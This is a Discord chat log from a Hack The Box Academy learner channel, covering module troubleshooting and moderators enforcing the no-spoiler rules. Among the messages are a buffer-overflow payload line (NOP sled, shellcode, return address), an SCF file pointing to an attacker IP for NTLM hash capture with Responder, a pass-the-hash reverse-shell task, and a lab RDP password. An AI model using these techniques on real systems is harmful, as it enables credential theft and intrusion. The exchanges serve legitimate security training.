#modules
well let me double check now lol
Glad I'm not the only one to make that mistake
I think it's 0
but revealing potential commands that result in answers is still iffy
as someone can just copy/paste your command without actually having learned a god damn thing
@sand rose there's a reason i keep this gif on standby
I hate that this is the way.
nxc worked Hare Krishna!
Would be pretty boring if we were just all innately good at everything
Sucking at something and learning is how I got into tech lol... Arch killed my laptop and I spent four days fixing it xD
i'm learning js/ts and am failing miserably (learning via the game BitBurner) because i learned i need to account for Out of Bounds errors, like results returning -1; or if it's very large it just says "alright, it's infinity now"
luckily they have a discord which massively helped me understand where i was going wrong
and even how to optimize the things that i knew what i needed to do.
I think nxc is becoming my most used tool. It's worth taking a read of their docs to learn what else can be done with it.
there's often a thing (especially with coding) that you know what you need to do, but discovering how to do it is something else
The web proxies burp intruder question is gonna take 40hrs or sthing, does anyone know the flag?
web proxies module
i.e. you know you need to read /root/root.txt or C:/users/administrator/root.txt
we don't share flags here
😢
also it won't take the full 40 hours; if the module told you to reduce the list used, do that
sans
and sometimes the answer is near the top of the list, let it run for a minute, then sort by response size
You're asking for sans?
There's also Ncrack, do you ever use that?
Is it okay to share my notes on this stack overflow then? Just to see how it's going?
if it reveals module contents for a module above tier 0; no
@fathom pendant Also: I'm not getting any response in the support (at least live). Before I send a Ticket through email, do you have any other ideas for troubleshooting steps with connecting up to the module? (Sorry to bug you again).
kk
support generally is gonna be slower around this time due to them generally being UK timezone
You will only get told to go to support with a ticket if you email in
They will get back to you, but yeah.. we can't give instant responses 24/7 I'm afraid
I hate that! You think that brute-forcing with a trillion-word list like rockyou is going to take a zillion years, so you don't bother, then find out that the word was there after all, right near the top.
hire me and i'll work 24/7/365 for 1 morbillion dollars 

That's understandable. I don't expect it either. I'm just impatient and trying to exhaust other options before sending a response that may take a day or 2. (Again, I know you guys are busy... It's me being impatient).
the general (rare cases where it isn't) rule of thumb is: if it takes > 30 minutes you're doing something wrong (even less for boxes on the main site)
note this doesn't translate outside of learning environments
and using premade lists on live sites generally won't get you anywhere
Hello im new and want to learn how to hack in a good way.
Can anyone help me?
If so dm me
I saw on a box that IPPSec (after enumerating users in an AD Environment) went through a process to generate his own wordlist based on policies and other info he was able to enumerat... is this kind of approach typically more used/practical in real world?
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
^
free?
yes
htb academy isn't free, and stuff you find on academy can be found elsewhere in medium articles and such that are free
the benefit of academy is that it's aggregated into a nice format with targets you can safely hack away at without accidentally taking down someone's infrastructure
is there any 100% free stuff i can use im completely new and want to learn i only know visual basic
knowing VB really isn't that helpful tbqh
ik
but as i said you'll have to google to find completely free stuff
what do i go to
plenty of medium articles on plenty of topics
like what do i download
I haven't used ncrack. Seems like it might be faster for what it does compared to nxc. However, nxc has so many more things that it can do.
i believe TryHackMe is also free
@bronze frigate I started from 0 about a year and a half ago. I'm not sure the extent of your computer knowledge, but I highly recommend getting familiar with networking and security principles first a bit. I know HTB has a IT Foundations Module and a Networking Basics module.... start there probably is best I'd imagine
and they offer a more hand-holding approach if you need the extra nudge
HTB is hands-off approach, at least with the active labs on https://app.hackthebox.com where you're given an IP and just told to find the user and root.txt files on a machine
all my computer knowledge is Visual Basic
that doesn't tell us anything; but this is veering off-topic of HTB academy
do i have to be a certain age?
I would start with the IT Foundations module. While not academy, Starting Point I think is a great way to get your feet wet as a beginner. Best of luck!
18+; 13+ with parental consent
this is due to data collection laws that HTB has to follow
Is it okay to turn my payload into just nopsled + shellcode + address?
and other legal reasons
will i learn enough with the free version
What are the tags to enclose a semi long bit of text so that it collapses?
three backticks right?
from my experience you get out proportionally as much as you put in
yeah
well with the free account on the main site you can access all active content; and there's sets of machines called "starting-point" that have walkthroughs and go through basics (note the guides may be outdated) and there's also some retired easy and medium machines that have a guided mode to learn from
Damn it was too big or somethin
Can I dm someone? That is the short version xD
why does it want so much info abt me
I added comments to make it less garbagey
it's the same info that most companies like this will ask for, you can give it bogus info if you want
also whats a good username?
I could make a copy and snip the long bits? if thats okay and shorten the comments. one min
your one on discord is fine if it's not already taken on the site ¯_(ツ)_/¯
That one wont even collapse now
Which module was this for again?
I probably have to go to support, but may I dm either @fathom pendant or @ocean night if they are able about something brief?
i'm not staff
Aha, maybe just this
```
// Make a nop sled and pick an address in the middle for the eip to drop in
$(python -c 'print "\x90" * (2064 - 452 - 4) + "<SNIP>" + "\x77" * 4')
// Choosing address: 0xffffd5cc
// Little endian "\xcc\xd5\xff\xff"
// Updating for eip - NOP + shellcode + 0xffffd5cc
$(python -c 'print "\x90" * (2064 - 452 - 4) + "<SNIP>" + "\xcc\xd5\xff\xff"')
```
I'm not here for support, sorry
Sometimes I do support, but it's last midnight for me
Past*
also; generally staff that are currently active on the dc are trying to separate work from discord (support people don't get paid to monitor the discord)
Noted. I assumed some were here for some work related purpose. Sorry about that, sincerely.
sometimes they do respond to help in the dc; however: that's the exception not the rule.
but they will ask that you have a support ticket open and chat will be moved to the support ticket
Why are you posting that if it's related to the answer on the module you were talking about earlier @storm shard ?
It's tier 0 but I can delete it, I just can't seem to figure out what's wrong and wanted to see if someone could see anything obvious
Oh fml
Is that not good to post?
No never mind, mixed up again. Good night.
lol you're good
I usually pass out around 10 these days
Okay, I have had somewhat of a breakthrough. I am so annoyed with myself.
... the number of bytes is not 425 -_-
I am getting code execution. Which feels wonderful, but there are permission errors for /bin/dash and for cat /root/flag.txt
for the purposes of the exercise that's irrelevant
why might I not be able to visit a target address?
using https instead of http
try using http instead
it's relevant if they want to work in a different shell
i have
Everything, as always, came down to small mistakes that were hard to notice in the big picture.
can i not visit if proxy/burpsuite is running???
i am on a different tab to look for it
is intercept on for burp? Might have to either forward the packets or momentarily turn it off?
This for a specific module/lab?
Web Proxies
@slender phoenix Have you been able to connect to the page at all? You also might need to edit your /etc/hosts file too?
Oh, this guy knows more than me, he can take the reins
Are you connected to burp proxy on your browser?
in the instance
Is burp intercept off?
uhuh
which section specifically? I can try to look at it myself too. I know you said the module is web proxies.
can't connect to server
Is this connected with an academy openvpn instance?
Are you including the port in the URL you're visiting?
yes
Bc I've often accidentally opened more than one so I do a killall and reopen one and make sure its connected.
yes
Is it a public ip? Can you send target ip?
Are you accessing the page from your host computer, VM, or the pwnbox?
sudo killall openvpn && sudo openvpn name.ovpn
which section are you on?
Looks like a docker ip to me(afaik are public)... but cant access it either
does it matter that i'm doing an attack? Like intercept might
need to know the section
@slender phoenix I just went to the first section I could spawn a target... I was able to connect up fine. Try refreshing the target?
probably just restart the target at this point though
can't really tell without knowing the section
the question
there are many questions in each section of the module, we need to know which section you're on
What is the question you're trying to answer?
under the table of contents
right so it is intruder
do you mean "Burp Intruder" section?
yeah section intruder
ok yeah, you're not going to get anything but a blank page on the root of the server. the instructions tell you to fuzz for the html file in the /admin directory.
i have, i know the file name? i think
you said root? i dunno
but i have the file
@ruby storm please post again without posting content from the module itself as it's above tier 0
Hello guys, im a little stuck in the Cracking Passwords with Hashcat module on section Cracking Common Hashes im given a hash that i need to crack and the hint is suggesting to use hybrid attack or one of the default rules, any insight on which rule to use or any other hint 😄
the causeeee....
yo im on cpts footprinting imap/pop3 section
im stuck on the last 2 questions and i thought the admin email was cto1... i checked but it wasnt and im confused on what else it would be and for the last one idk how to log into imap w/o a password
any one able to guide me ?
iirc checking all mails body was helpful in this exercise
what does iirc
If i recall correctly
how do i check a mails body
also wtf is the admin domain if its not cto..
and why dont my commands work in impac
The commands are covered in the section you are currently on @unique spruce, although you may need to do some reading on the steps outlined in the section.
If you are unsure on something, look at what you have learned, and look at documentation / man entries
A FETCH 1 BODY[]
something or other
dont worry man im about to punch my monitor because i didnt read the last sentence
that gave the credentials
ive spent an hour learning how to use hydra to brute force usernames
Yeah that part got me too 
atleast im learning hydra early
any idea why after ur encoding and i search in the browser it replaces alot of the url encoding with dots and back to the ascii values
cos that's what browsers do...
its one of the exercises that tells to url encode and search
and i need to bypass the filters by the web app so i have to url encode
If this is part of a module I probably haven't done it 
local file inclusions
Definitely haven't done it but you can probably try curl --path-as-is or something like that
it's the dash
Jajaja thanks
there's prolly something wrong with (ACADEMY-PWATTACKS-LM-MS01) in password attacks module, i cant seem to rdp in with the correct creds
The above X.509 certificate could not be verified, possibly because you do not have
the CA certificate in your certificate store, or the certificate has expired.
Please look at the OpenSSL documentation on how to add a private CA to the store.
Do you trust the above certificate? (Y/T/N) Y
[22:28:49:949] [8600:8601] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[22:28:49:949] [8600:8601] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[22:28:49:949] [8600:8601] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[22:28:49:949] [8600:8601] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1
module and section?
Password Attacks
Pass the Ticket (PtT) from Windows
https://academy.hackthebox.com/module/147/section/1639
did you wrap the password in single quotes?
xfreerdp /v:10.129.204.23 /u:Administrator /p:AnotherC0mpl3xP4$$
the exact command
try wrapping the password in single quotes as it contains special characters your terminal interprets as not part of the password.
works now, thanks
also protip for you, add /dynamic-resolution
I hate RDP but thanks for this lil piece of knowledge
hi
hello
im new
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Yoink #2 couldve been very useful when I was doing Shells&Payloads SA
i cant use this im not old enough
i use tryhackme
yo, thanks for this
body[]
idk mate just use RFC822 
(basically what body[] does)
Still think its stupid that ALL doesnt show it
because ALL grabs more of the metadata, than the actual data
Yah ik but its not intuitive 
blame RFC
Hi everyone can someone give me a hint for the privesc on titanic ty all
nvm I just found out
Hello everyone.
I need help with Cyber Lab, I can't figure out how to do "SQL Injection".
Which module is this?
I guess bro didn't really need help
not too sure if i can ask this but im in the Introduction to Threat Hunting & Hunting With Elastic module under the Hunting For Stuxbot part,
i dont get the filter part where the query includes dns.question.name:* but in the filter it excludes it. i dont rlly get the logic :o
Thanks
read #welcome and follow instructions
reposting: is it just me or is it nearly impossible to have findings with a "Low" (say, below 4.0) CVSS 3.1 score?
Take the "Directory listing enabled" finding example in the Documentation & Reporting module. This is a case where no sensitive data was found in said directories.
They got it to score 4.3 (and made it a "Low" too but technically 4.3 is "Medium") I guess by marking it as Adjacent attack vector, but if I can reach the relevant site from the Internet I think it should be Network, plus a Low confidentiality impact, making it a 5.3. The best I can do is change the Environmental factor for Confidentiality Requirement to also be Low, bringing it down to 4.6... still medium, and still sounding excessive, taking attention away from more important issues
ignore cvss scores for anything that doesn't have a direct exploitable impact, context and risk matter
It is not a module, it is a lab called "Cyber".
then it's not related to htb academy read and follow #welcome to access more of the server; if it's a lab on htb (and not a #starting-point machine) ask in #boxes otherwise ask on the platform that's hosting the lab
in order to gain access to the <no-access> channels see the first point
am I the only one that did not really get SSI Injection from the Server Side Attacks module ? I thought the other attacks were well explained until this one
In Windows PrivEsc, Interacting with Users. I start Responder, and get many lines like this:
[HTTP] Sending NTLM authentication request to 10.129.58.58
But nothing after that. What am I doing wrong?
Command: sudo responder -w -v -I tun0
Contents of the SCF file:
[Shell]
Command=2
IconFile=\\10.10.15.15\share\legit.ico
[Taskbar]
Command=ToggleDesktop
Ignore, I was missing the -F flag. Got the hash.
In Linux PrivEsc, Polkit section I cannot run "pkexec -u root id". I also tried to do it with PwnKit as in the section but cannot get it to work. I searched online I did not find any hints? Can anyone suggest me what should I do to Escalate Privileges?
Password Reuse / Default Password
For the initial question, it mentions to use the credentials that we got from the last module. I have a password that ends in: "ations}" (trying to not give anything away) is this the right one? I don't remember what the brute forced password was for the initial access or not - just trying to figure out if I have to run another brute force to get the same pw
it'll be for the user you got from the last section not module
the password isn't the flag from; it's literally just the user you discovered -- that's all
@fathom pendant where all peoples
please stop pinging people asking where they're at
I had a feeling, I'll just have to rerun the brute force for it - it's been a couple days since I've had the chance to work on this
this is why one of the recommendations when you discover passwords is to write that shit down
Hi everyone
Hi
yeah lol - I didn't know academy was gonna ask you to remember creds, should've known better lol
Hi, I am at the "Skills Assessment" of Broken Authentication. I solved it but I didn't fully understand what is going on. Can I ask someone? I don't want to spoil it. Thanks
Can anybody send link of HTB to start progress
Next time I will remember it thanks
Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible
Thanks
Alright. I got it. In fact, I just got a VIP subscription but unfortunately I can't start removed machines. The spawn button is disabled. Can someone help me?
Try logging out and back in. If that does not work - contact support via the website
Need to speak to a person? Learn how to reach our support via HTB Labs.
Have you connected to the lab vpn? It's usually greyed out for me until I connect up to it.
Hi, someone might help me for "HTTP Attack - TE.CL" - "Try to use what you learned in this section to exploit request smuggling to bypass the WAF and access the admin portal." please ?
Hello, I am working on the Attacking Authentication Mechanisms under web pen testing job role path and got stuck. In the challenge of Signature Exclusion Attack, it says 2 vhosts are required to solve the challenge. My questions is while using the pwnbox, how do I add these vhosts? Shouldn't they be already configured? If not, what IP address to use for these? Can somebody help me out here?
DM
DM
Anyone know where to go for some collaboration on HTB Seasons?
#1318239802931286066 if you can't access, read and follow #welcome
good morning, one question how you copy and paste in pwbox?
from outside the box to inside the box,
is not good question but 😩
anyone around finished Server Side Attacks skills assessment ? I managed to do it blind, but I still do not understand why something worked and something did not, anyone around I can DM about it ?
Hi everyone, I'm stuck in Abusing HTTP Misconfigurations
Skills Assessment - Hard lab and I need your help.
This allows you to copy texts to the PwnBox
DM
Final SA Question: Find the percentage of users with a path to GLOBAL ADMINISTRATOR. Submit the number as your answer (to two decimal points, i.e., 11.78).... some suggestions, I'm going crazy...
A cheatsheet is mentioned in the module. This cheatsheet shows you the query that calculates this number. You only need to adapt the query to Azure.
hey everyone is there anyone who can help me out with the metasploit part so the public exploit start of getting started
any module for cloud pentesting?
find -type f -name *.config -newermt 2020-03-03 -size +25k -size -28k I'm using this command in the https://academy.hackthebox.com/module/18/section/81 module for the first question and it's giving me a ton of options in any directory. Is there a specific one I should be in (directory)?
Is there a module in HTB that explains how to install Sharpview?
"Using the skills acquired in this and previous sections, access the target host and search for the file named 'waldo.txt'. Submit the flag found within the file."
Module: https://academy.hackthebox.com/module/167/section/1614
I am doing where /R C:\ waldo.txt and it is not working, tried C:\Users\ also..
Unless I missed it somewhere its kind of insane the Sharpview.exe isn't included as part of the Powerview/sharpview module.
thanks bro!
Need help with this odat.py script. Currently working on the "footprinting" module focusing on Oracle TNS. I am trying to run odat on my personal VM and i keep getting this "no module named crypto" error. I have done research and installed the appropriate modules incorporated with the odat service but still cannot get it to work. I can't even use it on the HTB machine either, there is a plugin associated with autorecon which I am still researching on how to use the odat plugin. any ideas?
sudo pip3 install Crypto --break-system-packages
i suggest running the install script from the module line by line instead of as one big install.sh
as the install.sh method breaks more often than it's worked
That script helped, I thought it did not at first since i was still getting the error (even when trying to call the module on its own) I did some research to double check everything was installed (grep command) but noticed that the module was all lower case, "Crypto vs crypto" and now everything works fine. lol. thank you
Hello everyone, I hope you guys are doing great. I'm having issues with figuring out how to go about the Login Brute Forcing Skills Assessment Part 2.
i log into the ssh using the user and password from the Part 1 and then i try brute forcing using the passwords.txt in that login: hydra -l t***** -P passwords.txt -s 50237 ftp://83.136.249.46
im at the linux fundamentals module and at the first question i cant answer the password in the set up terminal
That bs got me too
Dear all good day
need help for this
Navigate to http://[Target IP]:5601, click on the side navigation toggle, and click on "Dashboard". Either create a new visualization or edit the "Failed logon attempts [Admin users only]" visualization, if it is available, so that it includes failed logon attempt data where the username field contains the keyword "admin" anywhere within it. What should you specify after user.name: in the KQL query?
Ans:- user.name: admin
however its not correct can some one help please
Found it
i got it:- admin
need to give thank you
I don’t always fuck up a lab but when I do it, it’s always almost my fault
Yo anyone wanna make a hacker server with me?
Yuhh
I get all huzz
But lowk
I need people to make a fucking serv eith
My mf grammar !
So, I am trying to do the windows overflow assessment, tier 0 btw, and my payload worked on a local copy in the windows VM, but I am getting errors when I try to send it to the remote port
I assumed that I only had to change the ip to the target instance, but I get OSError: [Errno 113] No route to host when I try the code that popped a revshell without any issues in the VM
Hi
In theory, I should be able to just run the exact same python exploit and it will work, no? Unless there is some extra testing that I need to go over on the actual target - but, in that case, how am I supposed to monitor the behavior of the binary?
Nvm... I reset the instance and it worked. I think it was sitting there crashed after I sent to the wrong ip at first.
When doing pentest in a nutshell module specifically trying to exploit Wordpress form , when using msfconsole It keeps saying exploit completed but no session created I tried it several times
Anyone else came across similar issue
Idk if it might be because I’m using my main machine and not the instance
Seems to work on the instance I wonder why it doesn’t work on main machine
i was getting that
u using a VM on your main?
vmware hated doing reverse connections unless the vm was set to NAT and not bridged
for your network interface
@tired bough I was using wsl kali Linux
that miiiiight be why?
Yeah I wonder what’s the technical issue behind what’s causing it tho
i was wondering if its iptables but it seems to work on like local exploits on my network
i have a home lab with a vuln machine i practice msf on and do research with and it works fine
but anything over the vpn with reverse connections its seems to hate
so weird
I see
I AM STILL STUCK ON THE SAME ASSESSMENT
module attacking common services in section skill assessment hard
i dont know where to go from here
in section they presented how to view linked server and which user is used to access that maybe i need to bruteforce that user
I starting to hypothesize that hack the box has bugs and technical difficulties
anyone using WSL in windows had a problem with burpsuite where when you try to intercept, send to repeater, and modify the request in a way that you have something like trying to push a web shell like in the file upload module, but burpsuite returns an error like connection aborted by software host and does not return the response from the server? when I change the body of the request and instead of having a web shell php I have some random text, burpsuite works normally
i thought that maybe disabling the real time protection and firewall from windows defender could work but no
what is happening here
The only thing is my vpn keeps giving me a alert saying it’s connected so I don’t know if that’s the problem maybe I have to reconnect the vpn
I’m following the pentest in a nutshell module where I’m using metasploit to get information on the target when I get the meterpreter and then type shell I have this issue after only after typing in a command
wow that makes no sense
Like whisper said it could be a vpn issue I’m not going to waste time
yes i think that i had some problems like that with metasploit sometimes
most of the time the thing was that the exploit was not running successfully
Yeah I had that issue as well had to run exploit command several times before it work
but have you ever had this problem?
because this is some real shit right here
I have a ton of issues with WSL. I usually just opt for Parrot in vbox
My laptop is too old for WSL2, which might be better but I wouldn't know
I like it too, but I have resorted to only using it for basic things that Windows doesn't do. sed filtering lists/files for output, curl, wget, vim, git, etc. Just things that I am more comfortable in a shell with.
yes maybe i should do the same
VBox Parrot works very well and fullscreen mode feels seamless compared to my dual boot but I still can swap over to windows whenever I need to without rebooting
well what i like about wsl is that is low resource-consuming and i always have a ton of programs executing at the same time without having that much ram
maybe i could search for some type of cli based parrot on vbox
you know if that exists?
i solved the hard skill assessment of attacking common service and have some doubts
anyone ?
and there are other ways too to find the same flag .. after solving it feels like i am not 100percent understood this one
Which module is this for @empty trout ?
Oh
Common services lol
Damn it I'm blind, nvm
That is a Tier 2 module, so careful what you share about it
sorry for that
yeah
you know how could i solve this?
I don't know - ask their support I guess? Not here as tech support, sorry
You say random text.. check protocol, http vs https, all I'll say right now
Yeah contact port, but while you're waiting for a response check the WSL firewall settings if any? I dont use WSL but i understand its an OS within an OS so you're gonna have firewall stuff going on there too? Prob better just to proxy thru windows... part of me wonders whats the purpose for using burp... wait WSL is just a terminal right? Did you install a DE/WM?
WSL is notorious for strange/unexplained network issues.
yeah i didnt like the experience, i found it to be cumbersome personally and a little lacking in performance unless you have a "modern" computer so i was like ok whats the point
It really shouldn't be used for anything serious.
Works fine for me, but you could argue maybe I don't use it for many things serious
at least pentesting wise
Used to be nmap wouldn't work well due to lack of raw socket access, but that was fixed in later releases with WSL2
right on. if i had to use windows regularly for a job and they wouldnt let me use linux i would prob install wsl
I love it tbh
But it does have its limits
Fact you can use the GPU without configuring passthrough or any crap like that though, for LLM training etc
Very handy
didnt know that, interesting.
Ive never seen anything like that, but a full-blown linux shell that could run in windows would be awesome without the VM overhead to support a UI
WSL has some tools to run X server that have worked, but it took some tweaking
Pretty much is WSL, but yeah. Limitations. X server works, not perfect, but nicer than on a remote VM and connecting over network
I reckon it'll continue to improve
MS changed their tune so much on dev tooling and open sourcing. It's been great to see
X server over network is so god awful, but does work
..mostly
Is this normal on the pentest plus in a nutshell module when running linpeas
I asked ChatGPT and it says it’s not so what else can I do now
I got these output but compared to what hack the box was showing I wasn’t seeing printf
@quartz sundial please repost your question without revealing contents from the module as it's above tier 0.
nooooo... I spent so long formatting this text...
Who can I contact with a question in this case?
@viral slate please repost your question without spoiling content from the module
OH
@quartz sundial you can post your question here, just don't post content from the module is all
it will be difficult..
problem accessing share
using Pass The Hash attack)
I couldn't copy my question to rewrite it 😦
if you feel like you need to post info that would spoil content ask if someone can DM you. probably at least include which question/section/module you're stuck on.
I wrote my question in Sublime and then send here))
[Wi-Fi Penetration Testing Basics - Skills Assessment]
Currently working on skills assessment second question.
For some reason, I couldn't get any handshake and number of frames are incredibly low.
What should I do in this situation?
Are you using the methods taught in the Aireplay-ng section?
Ofc, also tried to do deauth attack, but wasn't really fruitful
Oh, wait, I think I got your point
life saving
Well, for some reason, when I tried to do deauth attack before - it didn't work, but now it worked just fine. Thanks a lot!
Module: Password Attacks
Section: Pass the Hash (PtH)
Question: Using Julio's hash, perform a Pass the Hash attack, launch a PowerShell console and import Invoke-TheHash to create a reverse shell to the machine you are connected via RDP (the target machine, DC01, can only connect to MS01). Use the tool nc.exe located in c:\tools to listen for the reverse shell. Once connected to the DC01, read the flag in C:\julio\flag.txt
im kinda confused, should i connect to julio with mimikatz then on another tab open a rdp session with julio account or what exactly? im lost
From what I understand, it's not a 100% thing - it might take some doing.
Module: Working with IDS/IPS Section: Suricata Fundamentals. Enter the requested PHP page as your answer. Answer format: _.php I got an answer but it won't accept it, I've had this issue before I so I want to make sure I'm not tripping
no it must be done within the same rdp session
Hello Guys. In the Information Gathering - Web Edition, Fingerprinting section, I'm having a hard time getting the CMS of app.inlanefreight.local (I did update my /etc/hosts file). I ran a nikto scan with -Tuning b, but nothing came up on it, when I looked at the webpage, I didn't see anything on there that indicated the software, and a look through the source didn't appear to have the answer. What am I missing?
nvm, I got it... I was in fact, missing something.
https://academy.hackthebox.com/module/20/section/113
Can anyone pls help me with the first question in this section as I tried all possible combinations of hybrid and rule attack with hashcat and I'm missing something as I can't crack the hash 😄
Are we supposed to complete the network skills assessment with the pwnbox?
You can use the pwnbox or your own VM for pretty much all of the modules, which module specifically?
Networking Fundamentals
looks like it, question 2 asks specifically for something running on the pwnbox
I was doing the last questions and then my gf came over and we went to go eat and I closed the pwnbox and I only get 1 spawn per day so I moved to vpn but alas... I think I can only answer it through the pwnbox instance since its my target
maaaaaan
dump her
it was only a joke!
Hello, I was wondering what steps you used? I too am stuck on this. I found the list of other users and created a list with those names and cross used them with hydra and the passwords.txt file but no luck.
big sadness though since i have been doing everything through the vpn on my own machine and now i have to wait 24 hours to finish this module 😦
oh there it is
Just buy cheapest sub
I am way too broke to do that.
Hey
Guys I'm currently reading books for hacking and I stumbled upon black hat python 2nd ed
I have basic python knowledge. But why did the book drop straight into hard stuff and the format looked weird like three ''' which made no sense can anyone guide me to a book that's better or a website with a walkthrough?
Triple quotes are block quotes which you can use to document your code better and not have to worry about which quotes you use inside of your documentation
Breaking into stuff you don't own or have permission to break into is illegal
It's just one of those scammer ppl, check account creation. The server has been flooded with them lately :/
I had someone trying to fish information out of me acting as tech support in my dms a week ago
As tech support... in a literal fucking security server 😭
@weak basin breaking into things you don't own or have authorization to access is illegal
sorry @thin parrot misclicked and deleted your message
no worries lol
Fair enough
you also get kids and illiterate folks with negative braincells that just see the word "hack" and think that it's just a server about illegal activities
asking ppl to find their ex's contact
and don't understand basics of joining any server/forum of read the god damn rules
this isn't exclusive to discord, you see it in other forums and such
i remember it way back when i used to use TeamSpeak
This isn't the answer for a question but I'll cover it up anyway... Just trying to figure out why this isn't printing any subdomains
||gobuster vhost -u http://83.136.249.46:36455 -w /home/htb-ac-1070752/Downloads/bitquark-subdomains-top100000.txt --append-domain||
I'm almost certain it's the wordlist as it completed without any issues.. just printed nothing to the terminal. Assuming that means not a single subdomain was discovered relative to that wordlist.
I've never used TeamSpeak, Discord was my first exposure to any sort of forum. But that makes sense, I could see myself hopping on here at 7 years old trying to act like a cool hacker 😂
if you want something beginner friendly, maybe start with "violent python"
it's a bit old but it still gets the job done
cos to find subdomains you gonna need a domain... all you got is an ip. --append-domain takes whatever's in your --url/-u flag and adds it to the vhost header: e.g VHOST.83.136.249.46:36455 which doesn't exist...
🤦♂️ Thank you
if you want to use the domain you're gonna have to add it to your /etc/hosts file then use the domain in the url field instead
you need a domain to append
it doesn't automagically know
Wait but does a domain not map to some ip? I'm a bit confused because I'm pretty sure there can be virtual hosts under a webserver's vhost config and that an http header determines which page or even alternative site is retrieved..?
I'm mixing this up somehow
dns handles that
Like correspondence said, usually there's entries in a DNS server, in this case since the ip isn't in any public DNS server we have to use the /etc/hosts file to say that this IP is for this domain or /etc/resolv.conf file to specify a DNS.
OHHH ok that makes more sense thank you
im falling asleep waiting gobuster to finish
same but with hydra
Mod: Password Attacks
Sec: Password Mutations
This supposed to be taking this long? been running for 30 mins using a mutated word list with the rules and password list from the resources...
im going to lose my mind
first the target goes down earlier than expected
then the pwnbox session closes
I have to do the scan for a third time 
I had loads of issues with the passwords attack modules. On some of the sections you have to use the list on the resources from the previous section. I'm sure password mutations was one of them.
I am using the resources lists... as I mentioned in the message 
almost an hour now... 
what I'm saying is if you go back a page and get the pw-list from resources on that page it should work once you've done the mutations with that pw-list file
The file from the resources doesn't change, it's the same file throughout the module
You would like to think so and I know it's named the same but they are different. I had the same problem. Try getting the password list from either the next page or previous page and try again with the mutations, if your command's right this will work.
they're the same files mate idk what you're on about
left: password mutation resources, right: network services resources
Oh my god one of the questions is still unanswered... it wasnt in the wordlist
Would it be wrong at this point to just search up the answer
eh i found the wordlist for it thats good enough
Any reason why ReconSpider returns nothing in the results.txt
ok you need to specify protocol nvm
Hey
why?
😂
- We don't encourage account sharing in this server, especially bank accounts
- Unrelated to the channel
- I smell something barely legal
You having issues with paying for Academy @brisk leaf ?
very specific to ask for an indian account 😄
No issues at all
I think #challenges
@somber flax like 000xblPan said #challenges if you don't have access to the channel get verified, instructions ---> #welcome
Guys anyone worked with integrating hive and misp… if yes please DM me
has anyone done the 'Introduction to Process Injection' in 'Introduction to Windows Evasion Techniques'?
the code in the section's guide fails to spawn the calculator
thank you
it's "Getting Started", public exploits section @tranquil crystal
thanks
if I'm supposed to exploit services, I need to be able to scan it..so ...yea..what gives?
go to it in your browser
Simple Backup Plugin 2.7.10 for WordPress can backup and download your WordPress website and MySQL Database.
You will see this. Search for exploits for this wordpress plugin
that's what the module wants you to do
sigh ok...
You're not going to scan it. Just go to it in your browser
"Try to identify the services" my ass
just say "get the exploit from the page you spawned"
it's running a web server on that port
Once you do, try to get the content of the '/flag.txt' file. (note: the web server may take a few seconds to start)
See, it's a web server running on that port
you're not supposed to nmap it.
you misunderstood my friend 🙂
I'm not denying that the web server is the likely path or somewhere I'd go... I just read "identify the services" and think if they're telling me that, it's a practice to doing the thing...not a statement detached from possibility
it's kind of like if you told me "Gushu, don't eat a chili dog on Wednesday"...and like...I never was planning to
http://94.237.55.96:38421/wp-login.php try here as well, you will see a wp login page
now try to hack this using public exploits using the software it shows you is running
it should be a vuln. plugin
that was my ip, but you should change to yours
http://94.237.55.96:38421/simple-backup/ read the page and it tells you that it creates a dir here for backups
https://www.rapid7.com/db/modules/auxiliary/scanner/http/wp_simple_backup_file_read/ I think the module wants you to use msfconsole and try to read the flag.txt file in /
This module exploits a directory traversal vulnerability in WordPress Plugin "Simple Backup" version 2.7.10, allowing to read arbitrary files with the web server privileges.
I hope that helps
TBF if you're given an ip and a port the first thing you'd do is to try reaching it 
lol I knew it was probably web... I also know I can nc it if it's not..see whats going on
but it's telling me to look at services
Heh
in my mind if I'm looking at services, I'm scanning it.... -sV and such....
not visiting a page to google/msf the version of some plugin
even if that's an obvious thing to try to see if it progresses, it's not "look at services"
it's "exploit this low hanging fruit"
grumble and now host resolution fails
reset it and try again
whenever you're given an IP:PORT your only scope is the PORT on that IP
That's what we've been telling him
also you're doing an easy/basic module that's just got a bit of most things to get you into understanding what you'll run across
it's not expecting you to do something insanely crazy
the examples are there to show you the flow of figuring it out
discover X
search X
try Y Exploit
I wasn't expecting crazy..just the ability to actually see ftp, ssh, smb, and so on... if I'm expected to consider them...and if not, then why bring them up?
as for resolution... noted..I forgot RPORT
They weren't brought up
actually SMB is brought up as the example
but that's mostly because it has one of the most well known exploits out there; EternalBlue
Yes in the example
aside from that though you can't expect the examples to always be 1::1 to what to expect in the lab, the section is about finding public exploits to something -- so you first figure out what it is that something is
the public IP they give you is a docker container (luckily) so all the other ports are likely hosting labs for other people
Hello! I have some problem with JavaScript Deobfuscation, module 41 section 519 skills assessment the last 2 questions
Am I going crazy? Trying to move a file from SSH from a HTB module to my own to unzip -- tried scp "path_to_file" "output_destination" doesn't seem to work though
can you provide the command you used?
scp /home/kira/Documents/Notes.zip /home/me/Desktop
no such file directory lol
Can you link to the module and what section ?
Password Attacks | Default Passwords / Password Reuse
Are you running the command locally?
link the module here so I can easily click it
Connected to a user through SSH if that helps? Not sure what you mean by locally to be honest
The format is
scp user@remote.server:/path/to/file /path/to/local/
yeah I tried that
You run this on your machine, not on the target
This was covered at length in the file transfers module - did you skip it?
No, just starting to slowly get back in to this after quite a bit of time away from it
Hello everyone please help me with the module LOGIN BRUTE FORCING Skills Assessment Part2
the info you need is given in assessment one
I found the name Thomas
How is the HTB Academy path estimated time calculated - I think CPTS said it was in the 40 days. Is that based on the combined hours?
as in 960 hours?
It's based on 8 hour days of complete work
Thanks mate
Hey guys, I am facing a problem with the Shells and payloads module >> Automating Payloads with Metasploit q2 everytime I use psexec smb exploit
it returns an exploit was created but nothing really happens
https://academy.hackthebox.com/module/110/section/1053
